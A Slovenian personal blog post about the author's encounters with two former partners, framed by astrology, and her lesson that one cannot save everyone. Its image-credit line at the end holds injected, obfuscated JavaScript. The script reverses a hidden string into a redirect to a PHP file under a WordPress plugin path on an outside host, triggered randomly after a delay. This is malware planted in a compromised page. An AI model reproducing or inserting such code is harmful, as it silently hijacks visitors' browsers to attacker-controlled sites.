Kaj so me naučili bivši partnerji

Venerin retrograd je med drugim znan tudi po tem, da se nenadoma pojavi v tvoji bližini oseba, ki ti je bila nekoč blizu. Mislim, da zato, da nas spomni na dogodke iz katerih se lahko učimo za sedanjost.

Ravno to se mi je zgodilo včeraj. Po štirih letih sem videla osebo, s katero sva bila nekoč v intimnem odnosu. Ta oseba je bila še edina preostala, ki je še nisem videla v vsem tem času. Zanimala me je reakcija, resnično. Ne zato, da bi s to osebo vzpostavila stik, ampak preprosto zato, ker sem želela razbrati iz mimike kakršnekoli spremembe v njihovem življenju.

Reakcija je bila kot, da je ne bi bilo. Oseba se je pretvarjala, da me ne vidi. Bilo je tako kot, da se nikoli ne bi poznala. Bilo je tako, kot se obnašamo mi, ko gremo mimo neznane osebe. Preprosto je ne pogledamo. Enako se je zgodilo tudi z drugo osebo, ki je imela enako vlogo v mojem življenju. Bilo je tako, da sta osebi obe z dvignjeno glavo gledali čimbolj stran od mene in videla sem, da je bilo to namerno. Videla se, da ne vesta kako bi se drugače spopadli s tem “srečanjem”.

Kaj sem se naučila iz teh dveh situacij?
Za nauk te zgodbe velja omeniti še eno skupno lastnost teh dveh oseb. Obe sta bili zelo prizadeti, ko sem z njima začela odnos. Obe osebi sem poskušala učiti o lepotah življenja, o notranji moči, o možnosti izbire in več kot očitno nista sprejeli mojih nasvetov in slišali pomena besed. Naučila sem se, da ni na meni, da rešim vse ljudi, ki trpijo. Kar lahko naredim je le to, da jim pokažem drugo plat in upam, da jim bo dalo za misliti.

Vedno sem poskušala reševati polomljene ljudi, a na koncu sem dala za njih vso svojo energijo, kar me je spravilo v resno depresijo. Nauk je sledeči: “You can’t save everyone.” Včasih moraš pač pustiti, da se ljudje rešijo sami. Samo njihova lastna volja je tista, ki jih lahko reši, ne glede na to, koliko truda v njih vložijo drugi.

S tem zaključujem še en del znanja, ki mi ga prinaša vesolje.

Z Ljubeznijo;
(Ni)Si

Prikazana slika: $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/stranger?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash